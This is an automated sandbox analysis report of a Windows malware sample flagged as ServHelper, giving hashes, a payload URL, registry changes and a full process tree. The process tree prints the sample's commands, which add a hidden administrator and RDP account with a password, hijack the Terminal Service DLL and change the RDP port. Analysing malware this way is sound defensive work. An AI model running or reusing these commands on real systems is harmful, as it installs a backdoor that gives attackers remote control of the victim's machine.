Analysis
-
max time kernel
147s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
29-09-2021 15:40
Static task
static1
Behavioral task
behavioral1
Sample
74f029d2fd587f9e25091f7832bea2f2.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
74f029d2fd587f9e25091f7832bea2f2.exe
Resource
win10v20210408
General
-
Target
74f029d2fd587f9e25091f7832bea2f2.exe
-
Size
5.7MB
-
MD5
74f029d2fd587f9e25091f7832bea2f2
-
SHA1
76fb2d051d6dc938ba2b7131ef1b21c0fe2ad60c
-
SHA256
5f0c0223d10468b9130a240432342f4056c6d7c2f6f89469c9d971bcea31255a
-
SHA512
0386c61a89b414ab50c2c7b371d2bab288bde154da35c643de423622b05e99fcc748f5b0b9e53f8da00e6dccd02cf535b6d41c15fbddfa732a599db3bac45a23
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 9 1256 powershell.exe 11 1256 powershell.exe 12 1256 powershell.exe 13 1256 powershell.exe 15 1256 powershell.exe 17 1256 powershell.exe 19 1256 powershell.exe 21 1256 powershell.exe 23 1256 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 4060 4060 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jmdnpxl1.h1n.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF6EE.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_r0shovbz.p0n.psm1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF74C.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF76D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF78D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF79D.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 3180 powershell.exe 3180 powershell.exe 3180 powershell.exe 3612 powershell.exe 3612 powershell.exe 3612 powershell.exe 1128 powershell.exe 1128 powershell.exe 1128 powershell.exe 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 1256 powershell.exe 1256 powershell.exe 1256 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 3180 powershell.exe Token: SeIncreaseQuotaPrivilege 3180 powershell.exe Token: SeSecurityPrivilege 3180 powershell.exe Token: SeTakeOwnershipPrivilege 3180 powershell.exe Token: SeLoadDriverPrivilege 3180 powershell.exe Token: SeSystemProfilePrivilege 3180 powershell.exe Token: SeSystemtimePrivilege 3180 powershell.exe Token: SeProfSingleProcessPrivilege 3180 powershell.exe Token: SeIncBasePriorityPrivilege 3180 powershell.exe Token: SeCreatePagefilePrivilege 3180 powershell.exe Token: SeBackupPrivilege 3180 powershell.exe Token: SeRestorePrivilege 3180 powershell.exe Token: SeShutdownPrivilege 3180 powershell.exe Token: SeDebugPrivilege 3180 powershell.exe Token: SeSystemEnvironmentPrivilege 3180 powershell.exe Token: SeRemoteShutdownPrivilege 3180 powershell.exe Token: SeUndockPrivilege 3180 powershell.exe Token: SeManageVolumePrivilege 3180 powershell.exe Token: 33 3180 powershell.exe Token: 34 3180 powershell.exe Token: 35 3180 powershell.exe Token: 36 3180 powershell.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeIncreaseQuotaPrivilege 3612 powershell.exe Token: SeSecurityPrivilege 3612 powershell.exe Token: SeTakeOwnershipPrivilege 3612 powershell.exe Token: SeLoadDriverPrivilege 3612 powershell.exe Token: SeSystemProfilePrivilege 3612 powershell.exe Token: SeSystemtimePrivilege 3612 powershell.exe Token: SeProfSingleProcessPrivilege 3612 powershell.exe Token: SeIncBasePriorityPrivilege 3612 powershell.exe Token: SeCreatePagefilePrivilege 3612 powershell.exe Token: SeBackupPrivilege 3612 powershell.exe Token: SeRestorePrivilege 3612 powershell.exe Token: SeShutdownPrivilege 3612 powershell.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeSystemEnvironmentPrivilege 3612 powershell.exe Token: SeRemoteShutdownPrivilege 3612 powershell.exe Token: SeUndockPrivilege 3612 powershell.exe Token: SeManageVolumePrivilege 3612 powershell.exe Token: 33 3612 powershell.exe Token: 34 3612 powershell.exe Token: 35 3612 powershell.exe Token: 36 3612 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeIncreaseQuotaPrivilege 1128 powershell.exe Token: SeSecurityPrivilege 1128 powershell.exe Token: SeTakeOwnershipPrivilege 1128 powershell.exe Token: SeLoadDriverPrivilege 1128 powershell.exe Token: SeSystemProfilePrivilege 1128 powershell.exe Token: SeSystemtimePrivilege 1128 powershell.exe Token: SeProfSingleProcessPrivilege 1128 powershell.exe Token: SeIncBasePriorityPrivilege 1128 powershell.exe Token: SeCreatePagefilePrivilege 1128 powershell.exe Token: SeBackupPrivilege 1128 powershell.exe Token: SeRestorePrivilege 1128 powershell.exe Token: SeShutdownPrivilege 1128 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeSystemEnvironmentPrivilege 1128 powershell.exe Token: SeRemoteShutdownPrivilege 1128 powershell.exe Token: SeUndockPrivilege 1128 powershell.exe Token: SeManageVolumePrivilege 1128 powershell.exe Token: 33 1128 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
74f029d2fd587f9e25091f7832bea2f2.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 1404 wrote to memory of 2336 1404 74f029d2fd587f9e25091f7832bea2f2.exe powershell.exe PID 1404 wrote to memory of 2336 1404 74f029d2fd587f9e25091f7832bea2f2.exe powershell.exe PID 2336 wrote to memory of 1444 2336 powershell.exe csc.exe PID 2336 wrote to memory of 1444 2336 powershell.exe csc.exe PID 1444 wrote to memory of 4092 1444 csc.exe cvtres.exe PID 1444 wrote to memory of 4092 1444 csc.exe cvtres.exe PID 2336 wrote to memory of 3180 2336 powershell.exe powershell.exe PID 2336 wrote to memory of 3180 2336 powershell.exe powershell.exe PID 2336 wrote to memory of 3612 2336 powershell.exe powershell.exe PID 2336 wrote to memory of 3612 2336 powershell.exe powershell.exe PID 2336 wrote to memory of 1128 2336 powershell.exe powershell.exe PID 2336 wrote to memory of 1128 2336 powershell.exe powershell.exe PID 2336 wrote to memory of 2764 2336 powershell.exe reg.exe PID 2336 wrote to memory of 2764 2336 powershell.exe reg.exe PID 2336 wrote to memory of 3876 2336 powershell.exe reg.exe PID 2336 wrote to memory of 3876 2336 powershell.exe reg.exe PID 2336 wrote to memory of 4084 2336 powershell.exe reg.exe PID 2336 wrote to memory of 4084 2336 powershell.exe reg.exe PID 2336 wrote to memory of 3620 2336 powershell.exe net.exe PID 2336 wrote to memory of 3620 2336 powershell.exe net.exe PID 3620 wrote to memory of 3556 3620 net.exe net1.exe PID 3620 wrote to memory of 3556 3620 net.exe net1.exe PID 2336 wrote to memory of 3596 2336 powershell.exe cmd.exe PID 2336 wrote to memory of 3596 2336 powershell.exe cmd.exe PID 3596 wrote to memory of 1228 3596 cmd.exe cmd.exe PID 3596 wrote to memory of 1228 3596 cmd.exe cmd.exe PID 1228 wrote to memory of 3604 1228 cmd.exe net.exe PID 1228 wrote to memory of 3604 1228 cmd.exe net.exe PID 3604 wrote to memory of 3980 3604 net.exe net1.exe PID 3604 wrote to memory of 3980 3604 net.exe net1.exe PID 2336 wrote to memory of 3016 2336 powershell.exe cmd.exe PID 2336 wrote to memory of 3016 2336 powershell.exe cmd.exe PID 3016 wrote to memory of 3296 3016 cmd.exe cmd.exe PID 3016 wrote to memory of 3296 3016 cmd.exe cmd.exe PID 3296 wrote to memory of 4084 3296 cmd.exe net.exe PID 3296 wrote to memory of 4084 3296 cmd.exe net.exe PID 4084 wrote to memory of 1292 4084 net.exe net1.exe PID 4084 wrote to memory of 1292 4084 net.exe net1.exe PID 1264 wrote to memory of 796 1264 cmd.exe net.exe PID 1264 wrote to memory of 796 1264 cmd.exe net.exe PID 796 wrote to memory of 804 796 net.exe net1.exe PID 796 wrote to memory of 804 796 net.exe net1.exe PID 4036 wrote to memory of 3180 4036 cmd.exe net.exe PID 4036 wrote to memory of 3180 4036 cmd.exe net.exe PID 3180 wrote to memory of 1248 3180 net.exe net1.exe PID 3180 wrote to memory of 1248 3180 net.exe net1.exe PID 3252 wrote to memory of 3556 3252 cmd.exe net.exe PID 3252 wrote to memory of 3556 3252 cmd.exe net.exe PID 3556 wrote to memory of 1792 3556 net.exe net1.exe PID 3556 wrote to memory of 1792 3556 net.exe net1.exe PID 3604 wrote to memory of 3612 3604 cmd.exe net.exe PID 3604 wrote to memory of 3612 3604 cmd.exe net.exe PID 3612 wrote to memory of 920 3612 net.exe net1.exe PID 3612 wrote to memory of 920 3612 net.exe net1.exe PID 796 wrote to memory of 1792 796 cmd.exe net.exe PID 796 wrote to memory of 1792 796 cmd.exe net.exe PID 1792 wrote to memory of 3344 1792 net.exe net1.exe PID 1792 wrote to memory of 3344 1792 net.exe net1.exe PID 2356 wrote to memory of 920 2356 cmd.exe net.exe PID 2356 wrote to memory of 920 2356 cmd.exe net.exe PID 920 wrote to memory of 1384 920 net.exe net1.exe PID 920 wrote to memory of 1384 920 net.exe net1.exe PID 3252 wrote to memory of 3924 3252 cmd.exe WMIC.exe PID 3252 wrote to memory of 3924 3252 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\74f029d2fd587f9e25091f7832bea2f2.exe"C:\Users\Admin\AppData\Local\Temp\74f029d2fd587f9e25091f7832bea2f2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\haftagsk\haftagsk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FC5.tmp" "c:\Users\Admin\AppData\Local\Temp\haftagsk\CSC7EDA78EA8A094F018439CB9964965DA0.TMP"4⤵PID:4092
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2764
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3876
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4084
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3556
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3980
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1292
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4736
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:4752
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:804
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc EdrwL8Uu /add1⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\system32\net.exenet.exe user wgautilacc EdrwL8Uu /add2⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc EdrwL8Uu /add3⤵PID:1248
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:1792
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:920
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:3344
-
-
-
